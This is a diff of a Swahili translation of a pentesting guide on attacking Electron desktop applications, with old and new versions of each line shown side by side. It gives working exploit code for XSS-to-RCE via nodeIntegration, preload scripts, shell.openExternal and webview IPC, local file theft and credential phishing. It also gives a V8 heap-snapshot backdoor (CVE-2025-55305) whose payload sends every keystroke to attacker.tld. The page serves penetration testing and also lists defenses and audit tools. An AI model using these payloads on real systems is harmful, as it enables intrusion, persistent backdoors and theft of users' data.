../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@ -112,7 +111,7 @@ Ikiwa unaweza kuendesha Electron App ndani ya mashine yako, inawezekana kwamba u
## RCE: XSS + nodeIntegration
Ikiwa **nodeIntegration** imewekwa kuwa **on**, JavaScript ya ukurasa wa wavuti inaweza kutumia vipengele vya Node.js kwa urahisi kwa kupiga tu `require()`. Kwa mfano, njia ya kuendesha application ya calc kwenye Windows ni:
Ikiwa **nodeIntegration** imewekwa kuwa **on**, javascript ya ukurasa wa wavuti inaweza kutumia vipengele za Node.js kwa urahisi kwa kuitisha `require()`. Kwa mfano, njia ya kuendesha programu calc kwenye Windows ni:
```html
<script>
require("child_process").exec("calc")
@ -124,7 +123,7 @@ top.require("child_process").exec("open /System/Applications/Calculator.app")
## RCE: preload
Script iliyotajwa katika mpangilio huu ni **imepakuliwa kabla ya scripts nyingine katika renderer**, hivyo ina **ufikiaji usio na kikomo kwa Node APIs**:
Skripti iliyotajwa katika mipangilio hii in**apakiwa kabla ya skripti zingine katika renderer**, hivyo ina **ufikiaji usio na mipaka kwa Node APIs**:
```javascript
new BrowserWindow{
webPreferences: {
@ -133,7 +132,7 @@ preload: _path2.default.join(__dirname, 'perload.js'),
}
});
```
Kwa hivyo, script inaweza ku-export node-features kwa pages:
Hivyo, script inaweza kusafirisha node-features hadi pages:
```javascript:preload.js
typeof require === "function"
window.runCalc = function () {
@ -149,20 +148,20 @@ runCalc()
</script>
</body>
```
> [!NOTE] > **Ikiwa `contextIsolation` imewezeshwa, hii haitafanya kazi**
> [!NOTE] > **Ikiwa `contextIsolation` imewashwa, hii haitafanya kazi**
## RCE: XSS + contextIsolation
_**contextIsolation**_ huanzisha **muktadha tofauti kati ya scripts za ukurasa wa wavuti na code ya ndani ya Electron** ili utekelezaji wa JavaScript wa kila code usiathiriane. Hii ni sifa muhimu kuondoa uwezekano wa RCE.
The _**contextIsolation**_ inatoa **muktadha uliogawanywa kati ya script za ukurasa wa wavuti na code ya ndani ya JavaScript ya Electron** ili utekelezaji wa JavaScript wa kila code usiathiriane. Hii ni sifa muhimu kuondoa uwezekano wa RCE.
Kama muktadha haukutengwa, mshambuliaji anaweza:
Ikiwa muktadha haujatengwa, mshambuliaji anaweza:
1. Endesha **JavaScript yoyote katika renderer** (XSS au kuvinjari kwenda tovuti za nje)
2. **Kuandika upya built-in method** ambayo inatumiwa katika preload au Electron internal code ili kudhibiti function
3. **Kusababisha** matumizi ya **function iliyooandikwa upya**
1. Kutekeleza **arbitrary JavaScript in renderer** (XSS au navigation to external sites)
2. **Kuandika upya built-in method** inayotumiwa katika preload au code ya ndani ya Electron ili kumiliki function
3. **Chochea** matumizi ya **overwritten function**
4. RCE?
Kuna sehemu 2 ambapo built-int methods zinaweza kuandikwa upya: Katika preload code au katika Electron internal code:
Kuna sehemu 2 ambapo built-in methods zinaweza kuandikwa upya: Katika code ya preload au katika code ya ndani ya Electron:
{{#ref}}
@ -179,9 +178,9 @@ electron-contextisolation-rce-via-electron-internal-code.md
electron-contextisolation-rce-via-ipc.md
{{#endref}}
### Bypass click event
### Kuepuka vikwazo vya tukio la klik
Kama kuna vizuizi vinavyotumika unapobofya link unaweza kuvipita kwa **kubofya kwa kitufe cha katikati (middle click)** badala ya bofya la kushoto la kawaida
Ikiwa vikwazo vinapotumika unapobofya kiungo, huenda ukaweza kuviweka kando kwa **kufanya middle click** badala ya bonyeza la kushoto la kawaida.
```javascript
window.addEventListener('click', (e) => {
```
@ -189,24 +188,24 @@ window.addEventListener('click', (e) => {
Kwa taarifa zaidi kuhusu mifano hii angalia [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) na [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
Wakati wa kupeleka programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya `nodeIntegration` na `contextIsolation` ni muhimu. Imebainishwa kwamba **client-side remote code execution (RCE)** inayolenga preload scripts au native code ya Electron kutoka main process inadhibitiwa kwa ufanisi ikiwa mipangilio hii imewekwa.
Wakati wa kupeleka programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya `nodeIntegration` na `contextIsolation` ni muhimu. Imebainika kwamba **client-side remote code execution (RCE)** inayolenga preload scripts au Electron's native code kutoka kwa main process inazuiziwa kwa ufanisi pale mipangilio haya yanapowekwa.
Wakati mtumiaji anapotumia viungo au kufungua madirisha mapya, wasikilizaji maalum wa matukio huanzishwa, ambayo ni muhimu kwa usalama na utendakazi wa programu:
Wakati mtumiaji anabofya linki au kufungua windows mpya, wasikilizaji maalum wa matukio huchomwa, ambayo ni muhimu kwa usalama na utendakazi wa programu:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
Wasikilizaji hawa **wanabadilishwa na programu ya desktop** ili kutekeleza **mantiki ya biashara** yake. Programu huchunguza kama kiungo kilichofunguliwa kinapaswa kufunguliwa ndani ya programu au katika kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia function, `openInternally`. Ikiwa function hii inarudisha `false`, inaonyesha kwamba kiungo kinapaswa kufunguliwa nje, kwa kutumia function `shell.openExternal`.
Wasikilizaji hawa huandikishwa upya na programu ya desktop ili kutekeleza mantiki yake ya biashara. Programu hupima ikiwa kiungo kilichopitiwa kinapaswa kufunguliwa ndani ya programu au katika kivinjari cha mtandao cha nje. Uamuzi huu kawaida hufanywa kupitia function, `openInternally`. Ikiwa function hii inarejesha `false`, inamaanisha kwamba kiungo kinapaswa kufunguliwa kwa nje, kwa kutumia function ya `shell.openExternal`.
**Hapa kuna pseudocode iliyorahishwa:**
**Here is a simplified pseudocode:**
![https://miro.medium.com/max/1400/1*iqX26DMEr9RF7nMC1ANMAA.png](<../../../images/image (261).png>)
![https://miro.medium.com/max/1400/1*ZfgVwT3X1V_UfjcKaAccag.png](<../../../images/image (963).png>)
Electron JS security best practices yanapendekeza kutoikubali content isiyo ya kuaminika kwa kutumia `openExternal`, kwani inaweza kusababisha RCE kupitia protocols mbalimbali. Systems za uendeshaji zinaunga mkono protocols tofauti ambazo zinaweza kusababisha RCE. Kwa mifano ya kina na maelezo zaidi juu ya mada hii, unaweza kurejea [rasilimali hii](https://positive.security/blog/url-open-rce#windows-10-19042), ambayo inajumuisha Windows protocol examples zinazoweza kutumiwa ku-exploit ugumu huu.
Electron JS security best practices zinashauri kutoikubali content isiyotegemewa kwa kutumia function ya `openExternal`, kwani inaweza kusababisha RCE kupitia protokoli mbalimbali. Mifumo ya uendeshaji inaunga mkono protokoli tofauti ambazo zinaweza kusababisha RCE. Kwa mifano ya kina na maelezo zaidi juu ya mada hii, tazama [this resource](https://positive.security/blog/url-open-rce#windows-10-19042), ambayo inajumuisha mifano ya protokoli za Windows zinazoweza kutumia udhaifu huu.
Katika macos, function ya `openExternal` inaweza kutumika vibaya kutekeleza amri yoyote kama katika `shell.openExternal('file:///System/Applications/Calculator.app')`.
In macos, the `openExternal` function inaweza kutumiwa kutekeleza amri za kiholela kama katika `shell.openExternal('file:///System/Applications/Calculator.app')`.
**Mifano ya Windows protocol exploits ni pamoja na:**
```html
@ -228,17 +227,17 @@ window.open(
)
</script>
```
## RCE: webviewTag + preload IPC dhaifu + shell.openExternal
## RCE: webviewTag + dhaifu preload IPC + shell.openExternal
Udhaifu huu unaweza kupatikana katika **[this report](https://flatt.tech/research/posts/escaping-electron-isolation-with-obsolete-feature/)**.
The **webviewTag** ni **sifa iliyokataliwa** inayoruhusu matumizi ya **NodeJS** katika **renderer process**, ambayo inapaswa kuzimwa kwa kuwa inaruhusu kupakia script ndani ya **preload context** kama:
The **webviewTag** ni **sifa iliyopitwa na wakati** inayoruhusu matumizi ya **NodeJS** katika **renderer process**, ambayo inapaswa kuzimwa kwani inaruhusu kupakia script ndani ya **preload context** kama:
```xml
<webview src="https://example.com/" preload="file://malicious.example/test.js"></webview>
```
Kwa hivyo, mshambuliaji anayefanikiwa kupakia ukurasa wowote anaweza kutumia tag hiyo ili **kupakia preload script yoyote**.
Kwa hivyo, mdukuzi ambaye anafanikiwa kupakia ukurasa wowote anaweza kutumia tag hiyo ili **load an arbitrary preload script**.
Preload script hii ilitumiwa vibaya kisha kuitisha **vulnerable IPC service (`skype-new-window`)** ambayo ilikuwa ikiita **`shell.openExternal`** ili kupata RCE:
Script hii ya preload ilitumiwa vibaya kisha kuitumia kuita **vulnerable IPC service (`skype-new-window`)** ambayo ilikuwa ikipiga **`shell.openExternal`** ili kupata RCE:
```javascript
(async() => {
const { ipcRenderer } = require("electron");
@ -249,13 +248,13 @@ await ipcRenderer.invoke("skype-new-window", `file:///C:/Users/${username[1]}/Do
}, 5000);
})();
```
## Kusoma Faili za Ndani: XSS + contextIsolation
## Kusoma Mafaili ya Ndani: XSS + contextIsolation
**Kuzima `contextIsolation` kunaruhusu matumizi ya `<webview>` tags**, sawa na `<iframe>`, kwa kusoma na exfiltrating faili za ndani. Mfano ulioonyeshwa unaonyesha jinsi ya kutumia udhaifu huu kusoma yaliyomo ya faili za ndani:
**Kuzima `contextIsolation` kunaruhusu matumizi ya tags `<webview>`**, sawa na `<iframe>`, kwa kusoma na exfiltrating mafaili ya ndani. Mifano iliyotolewa inaonyesha jinsi ya exploit udhaifu huu ili kusoma yaliyomo ya mafaili ya ndani:
![](<../../../images/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
Zaidi ya hayo, njia nyingine ya **kusoma faili ya ndani** imewasilishwa, ikionyesha udhaifu muhimu wa kusoma faili za ndani katika Electron desktop app. Hii inahusisha kuingiza script ili kuitumia application na exfiltrate data:
Aidha, njia nyingine ya **kusoma faili ya ndani** imeshirikiwa, ikionyesha udhaifu muhimu wa local file read katika Electron desktop app. Hii inahusisha kuingiza script ili exploit application na exfiltrate data:
```html
<br /><br /><br /><br />
<h1>
@ -271,45 +270,45 @@ frames[0].document.body.innerText
</script>
</h1>
```
## **RCE: XSS + Old Chromium**
## **RCE: XSS + Chromium ya zamani**
Ikiwa **chromium** inayotumiwa na programu ni **zamani** na kuna **vulnerabilities** zilizojulikana ndani yake, inaweza kuwa inawezekana kuitumia na kupata RCE kupitia XSS.\
Ikiwa **chromium** inayotumika na application ni **ya zamani** na kuna **known vulnerabilities** juu yake, inaweza kuwa inawezekana **kuitumia na kupata RCE kupitia XSS**.\
Unaweza kuona mfano katika **writeup** hii: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
## **XSS Phishing via Internal URL regex bypass**
## **XSS Phishing kupitia Internal URL regex bypass**
Iwapo umetambua XSS lakini **huwezi kusababisha RCE au kuiba faili za ndani**, unaweza kujaribu kuitumia kuiba **credentials kupitia phishing**.
Kama umepata XSS lakini **huwezi kusababisha RCE au kuiba faili za ndani** unaweza kujaribu kuitumia kuiba **credentials kupitia phishing**.
Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, ukiangalia code ya JS katika front-end:
Kwanza kabisa unahitaji kujua kinachotokea unapo jaribu kufungua URL mpya, ukichunguza JS code kwenye front-end:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
```
Wito wa **`openInternally`** utaamua ikiwa **link** itafunguliwa katika **desktop window** kama ni link inayomilikiwa na platform, **au** itafunguliwa katika **browser kama 3rd party resource**.
Mwito wa **`openInternally`** utaamua kama **link** itafunguliwa katika **desktop window** kwa kuwa ni link inayomilikiwa na jukwaa, **or** itafunguliwa katika **browser as a 3rd party resource**.
Katika kesi ambapo **regex** inayotumiwa na function ni **nyeti kwa bypasses** (kwa mfano kwa **kutokutoa escape kwa dots za subdomains**) mshambuliaji anaweza kutumia XSS kufungua **dirisha jipya ambalo** litakuwa kwenye miundombinu ya mshambuliaji **litaomba vigezo vya kuingia** kwa mtumiaji:
Katika kesi **regex** inayotumiwa na function iko **vulnerable to bypasses** (kwa mfano kwa **not escaping the dots of subdomains**), mshambuliaji anaweza kutumia XSS ili **open a new window which** itakayopangwa katika miundombinu ya mshambuliaji na kuwa **asking for credentials** kwa mtumiaji:
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
</script>
```
## `file://` Protokoli
## `file://` Protocol
Kama ilivyotajwa katika [the docs](https://www.electronjs.org/docs/latest/tutorial/security#18-avoid-usage-of-the-file-protocol-and-prefer-usage-of-custom-protocols) kurasa zinazoendeshwa kwa **`file://`** zina ufikiaji wa upande mmoja kwa kila faili kwenye mashine yako, ikimaanisha kwamba **masuala ya XSS yanaweza kutumika kupakia faili za aina yoyote** kutoka kwenye mashine ya mtumiaji. Kutumia **protokoli maalum** kunazuia matatizo kama haya kwa sababu unaweza kupunguza protokoli ili kutoa tu seti maalum ya faili.
As mentioned in [the docs](https://www.electronjs.org/docs/latest/tutorial/security#18-avoid-usage-of-the-file-protocol-and-prefer-usage-of-custom-protocols) pages running on **`file://`** zina ufikiaji wa pande moja kwa kila faili kwenye mashine yako, ikimaanisha kwamba **XSS issues can be used to load arbitrary files** kutoka kwa mashine ya mtumiaji. Kutumia **protokoli maalum** kunazuia matatizo kama haya kwa sababu unaweza kuzuia protokoli kutoa tu seti maalum ya faili.
## Moduli ya Remote
## Remote module
Moduli ya Remote ya Electron inaruhusu **mchakato za renderer kufikia API za mchakato mkuu**, ikirahisisha mawasiliano ndani ya programu ya Electron. Hata hivyo, kuamilisha moduli hii kunaweka hatari kubwa za usalama. Inapanua uso wa shambulio la programu, na kuifanya iwe nyeti zaidi kwa udhaifu kama cross-site scripting (XSS) attacks.
The Electron Remote module inaruhusu **renderer processes to access main process APIs**, ikirahisisha mawasiliano ndani ya programu ya Electron. Hata hivyo, kuamilisha module hii kunaleta hatari kubwa za usalama. Inapanua uso wa kushambuliwa wa programu, na kuifanya iwe nyeti zaidi kwa udhaifu kama vile cross-site scripting (XSS) attacks.
> [!TIP]
> Ingawa moduli ya **remote** inaonyesha baadhi ya API kutoka mchakato mkuu hadi mchakato za renderer, sio rahisi kupata RCE kwa kumeza tu komponenti hizi. Hata hivyo, komponenti zinaweza kufichua taarifa nyeti.
> Ingawa **remote** module inaonyesha baadhi ya APIs kutoka main hadi renderer processes, si moja kwa moja kupata RCE kwa kutumia components pekee. Hata hivyo, components zinaweza kufichua taarifa nyeti.
> [!WARNING]
> Programu nyingi ambazo bado zinatumia moduli ya **remote** hufanya hivyo kwa njia inayohitaji **NodeIntegration iwe imewezeshwa** katika mchakato wa renderer, jambo ambalo ni **hatari kubwa ya usalama**.
> Programu nyingi zinazotumia remote module bado hufanya hivyo kwa njia inayohitaji **NodeIntegration to be enabled** katika renderer process, ambayo ni **huge security risk**.
Tangu Electron 14, moduli ya `remote` ya Electron inaweza kuwa imewezishwa kwa hatua kadhaa; kutokana na sababu za usalama na utendaji, inashauriwa **kutoitumia**.
Tangu Electron 14 `remote` module ya Electron inaweza kuamshwa kwa njia kadhaa; kutokana na sababu za usalama na utendakazi ni **inashauriwa kutotumia**.
Ili kuiwezesha, kwanza inahitajika **kuiwezesha katika mchakato mkuu**:
Ili kuiwezesha, kwanza ilihitajika **enable it in the main process**:
```javascript
const remoteMain = require('@electron/remote/main')
remoteMain.initialize()
@ -320,37 +319,37 @@ mainWindow = new BrowserWindow({
})
remoteMain.enable(mainWindow.webContents)
```
Kisha, mchakato wa renderer unaweza kuingiza vitu kutoka kwenye module kama ifuatavyo:
Kisha, mchakato wa renderer unaweza ku-import objects kutoka kwa module kama ifuatavyo:
```javascript
import { dialog, getCurrentWindow } from '@electron/remote'
```
Mchapisho wa **[blog post](https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html)** unaonyesha baadhi ya **functions** za kuvutia zinazotolewa na object **`app`** kutoka kwa remote module:
**[blog post](https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html)** inaonyesha baadhi ya kazi za kuvutia zilizoonyeshwa na object **`app`** kutoka kwa remote module:
- **`app.relaunch([options])`**
- **Inazindua upya** programu kwa **kuexit** instance ya sasa na **kuanzisha** mpya. Inafaa kwa **app updates** au mabadiliko makubwa ya **state**.
- **Inaanza upya** programu kwa **kuacha** instance ya sasa na **kuzindua** mpya. Inafaa kwa **sasisho za app** au **mabadiliko makubwa ya hali**.
- **`app.setAppLogsPath([path])`**
- **Huweka** au **huunda** saraka kwa ajili ya kuhifadhi **app logs**. Logs zinaweza **kutolewa** au **kubadilishwa** kwa kutumia **`app.getPath()`** au **`app.setPath(pathName, newPath)`**.
- **Hutangaza** au **huunda** saraka kwa kuhifadhi **app logs**. Logi hizo zinaweza **kutolewa** au **kuhaririwa** kwa kutumia **`app.getPath()`** au **`app.setPath(pathName, newPath)`**.
- **`app.setAsDefaultProtocolClient(protocol[, path, args])`**
- **Inasajili** executable ya sasa kama **default handler** kwa **protocol** maalum. Unaweza kutoa **custom path** na **arguments** ikiwa zinahitajika.
- **Inasajili** executable ya sasa kama **default handler** kwa protocol fulani. Unaweza kutoa **custom path** na **arguments** kama inavyohitajika.
- **`app.setUserTasks(tasks)`**
- **Inaongeza** tasks kwenye **Tasks category** katika **Jump List** (Windows). Kila task inaweza kudhibiti jinsi app inavyofunguliwa (**launched**) au ni **arguments** gani zinapitishwa.
- **Inaongeza** tasks kwenye **Tasks category** katika **Jump List** (on Windows). Kila task inaweza kudhibiti jinsi app inavyofunguliwa au ni **arguments** gani zinapitishwa.
- **`app.importCertificate(options, callback)`**
- **Inaingiza** **PKCS#12 certificate** kwenye **certificate store** ya mfumo (Linux tu). **Callback** inaweza kutumika kushughulikia matokeo.
- **Inaingiza** cheti cha **PKCS#12** kwenye **certificate store** ya mfumo (Linux tu). **Callback** inaweza kutumika kushughulikia matokeo.
- **`app.moveToApplicationsFolder([options])`**
- **Inahamisha** programu kwenye **Applications folder** (macOS). Husaidia kuhakikisha **standard installation** kwa watumiaji wa Mac.
- **Inahamisha** programu kwenda **Applications folder** (on macOS). Husaidia kuhakikisha **standard installation** kwa watumiaji wa Mac.
- **`app.setJumpList(categories)`**
- **Inatengeneza** au **inaondoa** **custom Jump List** kwenye **Windows**. Unaweza kuainisha **categories** kupanga jinsi tasks zinavyoonekana kwa mtumiaji.
- **Inaunda** au **inaondoa** **custom Jump List** kwenye **Windows**. Unaweza kubainisha **categories** kupanga jinsi tasks zinavyoonekana kwa mtumiaji.
- **`app.setLoginItemSettings(settings)`**
- **Inabainisha** executable zipi zinaanza wakati wa **login** pamoja na **options** zao (macOS na Windows tu).
- **Inasanidi** ni executable zipi zinaanzishwa wakati wa **login** pamoja na **options** zao (macOS na Windows pekee).
Example:
Mfano:
```javascript
Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()
```
## systemPreferences module
API kuu kwa kufikia mipangilio ya mfumo na kutoa matukio ya mfumo katika Electron. Mbinu kama **subscribeNotification**, **subscribeWorkspaceNotification**, **getUserDefault**, na **setUserDefault** zote ni **sehemu ya** moduli hii.
Ni **API ya msingi** kwa kufikia mapendeleo ya mfumo na **kutuma matukio ya mfumo** katika Electron. Mbinu kama **subscribeNotification**, **subscribeWorkspaceNotification**, **getUserDefault**, na **setUserDefault** zote ni **sehemu ya** moduli hii.
**Mfano wa matumizi:**
```javascript
@ -367,31 +366,31 @@ console.log('Recent Places:', recentPlaces);
```
### **subscribeNotification / subscribeWorkspaceNotification**
* **Husikiliza** **arifa za asili za macOS** kwa kutumia NSDistributedNotificationCenter.
* Kabla ya **macOS Catalina**, ulikuwa unaweza sniff **arifa zote zilizosambazwa** kwa kutuma **nil** kwa CFNotificationCenterAddObserver.
* Baada ya **Catalina / Big Sur**, sandboxed apps bado zinaweza **subscribe** kwa **matukio mengi** (kwa mfano, **screen locks/unlocks**, **volume mounts**, **network activity**, n.k.) kwa kujiandikisha arifa **kwa jina**.
* **Inasikiliza** arifa za asili za **macOS** kwa kutumia NSDistributedNotificationCenter.
* Kabla ya **macOS Catalina**, uliweza sniff **all** distributed notifications kwa kupitisha **nil** kwa CFNotificationCenterAddObserver.
* Baada ya **Catalina / Big Sur**, apps zilizo kwenye sandbox bado zinaweza **subscribe** kwa **many events** (kwa mfano, **screen locks/unlocks**, **volume mounts**, **network activity**, n.k.) kwa kusajili notifications **by name**.
### **getUserDefault / setUserDefault**
* **Inashirikiana** na **NSUserDefaults**, ambayo huhifadhi mapendeleo ya **application** au **global** kwenye macOS.
* **Inashirikiana** na NSUserDefaults, ambayo huhifadhi mapendeleo ya programu au ya kimataifa kwenye macOS.
* **getUserDefault** inaweza **kutoa** taarifa nyeti, kama **eneo la faili za hivi karibuni** au **eneo la kijiografia la mtumiaji**.
* **getUserDefault** inaweza kupata taarifa nyeti, kama maeneo ya faili yaliyotumika hivi karibuni au eneo la kijiografia la mtumiaji.
* **setUserDefault** inaweza **kubadilisha** mapendeleo haya, na hivyo kuathiri **configuration** ya app.
* **setUserDefault** inaweza kubadilisha mapendeleo haya, ambayo yanaweza kuathiri usanidi wa app.
* Katika **matoleo ya zamani ya Electron** (kabla ya v8.3.0), tu **standard suite** ya NSUserDefaults ilikuwa inapatikana.
## Shell.showItemInFolder
Kazi hii inaonyesha faili iliyotolewa katika file manager, ambayo inaweza kutekeleza faili hiyo moja kwa moja.
Kazi hii inaonyesha faili iliyotolewa katika file manager, ambayo inaweza moja kwa moja kuendesha faili hiyo.
For more information check [https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html](https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html)
## Content Security Policy
Programu za Electron zinapaswa kuwa na **Content Security Policy (CSP)** ili **kuzuia XSS attacks**. **CSP** ni **standard ya usalama** inayosaidia **kuzuia** **utekelezaji** wa **untrusted code** katika browser.
Apps za Electron zinapaswa kuwa na **Content Security Policy (CSP)** ili **kuzuia XSS attacks**. **CSP** ni standard ya usalama inayosaidia **kuzuia** utekelezaji wa **untrusted code** kwenye browser.
Kwa kawaida hupangwa katika faili ya **main.js** au katika kiolezo cha **index.html** na CSP ndani ya meta tag.
Kwa kawaida imewekwa katika faili ya **`main.js`** au kwenye template ya **`index.html`** kwa kuweka CSP ndani ya **meta tag**.
For more information check:
@ -401,16 +400,16 @@ pentesting-web/content-security-policy-csp-bypass/
{{#endref}}
## **Tools**
## **Vifaa**
- [**Electronegativity**](https://github.com/doyensec/electronegativity) ni zana ya kubaini misconfigurations na security anti-patterns katika applications zinazotegemea Electron.
- [**Electrolint**](https://github.com/ksdmitrieva/electrolint) ni plugin ya VS Code open source kwa applications za Electron inayotumia Electronegativity.
- [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) kwa kuangalia third-party libraries zilizo vulnerable
- [**Electronegativity**](https://github.com/doyensec/electronegativity) ni chombo cha kubaini misconfigurations na security anti-patterns katika Electron-based applications.
- [**Electrolint**](https://github.com/ksdmitrieva/electrolint) ni plugin ya VS Code ya open source kwa Electron applications inayotumia Electronegativity.
- [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) kwa kuangalia third party libraries zenye udhaifu
- [**Electro.ng**](https://electro.ng/): Unahitaji kununua
## Maabara
In [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s) unaweza kupata maabara ili exploit vulnerable Electron apps.
Katika [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s) unaweza kupata maabara ya kutumia exploit dhidi ya vulnerable Electron apps.
Baadhi ya amri zitakazokusaidia katika maabara:
```bash
@ -437,18 +436,18 @@ npm start
```
## Local backdooring via V8 heap snapshot tampering (Electron/Chromium) CVE-2025-55305
Apps za Electron na zinazotegemea Chromium deserialize a prebuilt V8 heap snapshot at startup (v8_context_snapshot.bin, and optionally browser_v8_context_snapshot.bin) to initialize each V8 isolate (main, preload, renderer). Kihistoria, Electrons integrity fuses did not treat these snapshots as executable content, so they escaped both fuse-based integrity enforcement and OS code-signing checks. Kwa matokeo, kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kulitoa utekelezaji wa code wa kisiri, wa kudumu ndani ya app bila kuharibu the signed binaries au ASAR.
Apps za Electron na zile zinazotegemea Chromium hudeserialize prebuilt V8 heap snapshot wakati wa startup (v8_context_snapshot.bin, na hiari browser_v8_context_snapshot.bin) ili kuanzisha kila V8 isolate (main, preload, renderer). Kihistoria, Electrons integrity fuses hazikutofautisha snapshots hizi kama executable content, hivyo zilitoka kwenye enforcement ya integrity ya fuse na checks za OS code-signing. Kwa hivyo, kubadilisha snapshot kwenye usakinishaji unaoweza kuandikwa na mtumiaji kuliwezesha utekelezaji wa code kwa utendakazi wa siri na wa kudumu ndani ya app bila kuharibu binaries zilizotiwa saini au ASAR.
Key points
- Integrity gap: EnableEmbeddedAsarIntegrityValidation and OnlyLoadAppFromAsar validate app JavaScript inside the ASAR, but they did not cover V8 heap snapshots (CVE-2025-55305). Chromium similarly does not integrity-check snapshots.
- Attack preconditions: Local file write into the apps installation directory. Hii ni kawaida kwenye systems ambapo Electron apps au Chromium browsers zimewekwa under user-writable paths (e.g., %AppData%\Local on Windows; /Applications with caveats on macOS).
- Effect: Reliable execution of attacker JavaScript in any isolate by clobbering a frequently used builtin (a “gadget”), enabling persistence and evasion of code-signing verification.
- Affected surface: Electron apps (even with fuses enabled) and Chromium-based browsers that load snapshots from user-writable locations.
- Integrity gap: EnableEmbeddedAsarIntegrityValidation na OnlyLoadAppFromAsar zinathibitisha JavaScript ya app ndani ya ASAR, lakini hazikucover V8 heap snapshots (CVE-2025-55305). Chromium kwa namna ile ile haifanyi integrity-check kwa snapshots.
- Attack preconditions: Uandishi wa faili kwa eneo la usakinishaji la app na mtumiaji. Hii ni ya kawaida kwenye mifumo ambapo apps za Electron au browsers za Chromium zimesakinishwa kwenye paths zinazoweza kuandikwa na mtumiaji (mfano: %AppData%\Local kwenye Windows; /Applications kwa caveats kwenye macOS).
- Effect: Utekelezaji wa kuaminika wa attacker JavaScript katika isolate yoyote kwa kuandika juu builtin inayotumika mara kwa mara (gadget), kuruhusu persistence na kuepuka verification ya code-signing.
- Affected surface: Electron apps (hata zikiwa na fuses zimewezeshwa) na browsers za msingi wa Chromium zinazolisoma snapshots kutoka locations zinazoweza kuandikwa na mtumiaji.
Generating a malicious snapshot without building Chromium
- Use the prebuilt electron/mksnapshot to compile a payload JS into a snapshot and overwrite the applications v8_context_snapshot.bin.
- Tumia prebuilt electron/mksnapshot ili kukompaila payload JS ndani ya snapshot na kuoverwrite v8_context_snapshot.bin ya application.
Example wa payload ndogo (thibitisha uteklezaji kwa kulazimisha crash)
Example minimal payload (prove execution by forcing a crash)
```js
// Build snapshot from this payload
// npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"
@ -462,11 +461,11 @@ Array.isArray = function () {
throw new Error("testing isArray gadget");
};
```
Isolate-aware payload routing (run different code in main vs. renderer)
- Utambuzi wa main process: Node-only globals kama process.pid, process.binding(), au process.dlopen zipo katika main process isolate.
- Utambuzi wa browser/renderer: Browser-only globals kama alert zinapatikana wakati zikiendeshwa katika muktadha wa dokumenti.
Isolate-aware payload routing (endesha code tofauti katika main vs. renderer)
- Uchunguzi wa mchakato mkuu: Globali za Node pekee kama process.pid, process.binding(), au process.dlopen zipo katika isolate ya mchakato mkuu.
- Uchunguzi wa browser/renderer: Globali za browser pekee kama alert zinapatikana wakati zinapoendeshwa katika muktadha wa document.
Mfano wa gadget inayochunguza uwezo wa Node wa main-process mara moja
Mfano wa gadget unaochunguza uwezo wa Node wa mchakato mkuu mara moja
```js
const orig = Array.isArray;
@ -495,7 +494,7 @@ process.exit(0);
return orig(...arguments);
};
```
Renderer/browser-context data theft PoC (kwa mfano Slack)
Renderer/browser-context wizi wa data PoC (kwa mfano, Slack)
```js
const orig = Array.isArray;
Array.isArray = function() {
@ -519,24 +518,24 @@ fetch('http://attacker.tld/keylogger?q=' + encodeURIComponent(e.key), {mode: 'no
return orig(...arguments);
};
```
Mtiririko wa operator
1) Andika payload.js inayobadilisha builtin ya kawaida (mfano, Array.isArray) na hiari itumie matawi kwa kila isolate.
Mtiririko wa mwendeshaji
1) Andika payload.js ambayo inaharamisha builtin ya kawaida (mfano, Array.isArray) na, hiari, igawie matawi kwa kila isolate.
2) Jenga snapshot bila vyanzo vya Chromium:
- npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"
3) Funika faili za snapshot za programu lengwa:
- v8_context_snapshot.bin (always used)
- browser_v8_context_snapshot.bin (if the LoadBrowserProcessSpecificV8Snapshot fuse is used)
4) Anzisha programu; gadget itatekelezwa kila wakati builtin iliyochaguliwa inapoitwa.
3) Andika juu ya faili(ti) za snapshot za programu lengwa:
- v8_context_snapshot.bin (inayotumika kila wakati)
- browser_v8_context_snapshot.bin (ikiwa fuse ya LoadBrowserProcessSpecificV8Snapshot inatumiwa)
4) Anzisha programu; gadget itatekelezwa kila wakati builtin iliyochaguliwa inapotumika.
Vidokezo na mambo ya kuzingatia
- Integrity/signature bypass: Snapshot files are not treated as native executables by code-signing checks and (historically) were not covered by Electrons fuses or Chromium integrity controls.
- Uendelevu: Kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kwa kawaida hufanikiwa kuhimili anzisho upya za app na inaonekana kama app iliyotiwa saini na halali.
- Chromium browsers: The same tampering concept applies to Chrome/derivatives installed in user-writable locations. Chrome has other integrity mitigations but explicitly excludes physically local attacks from its threat model.
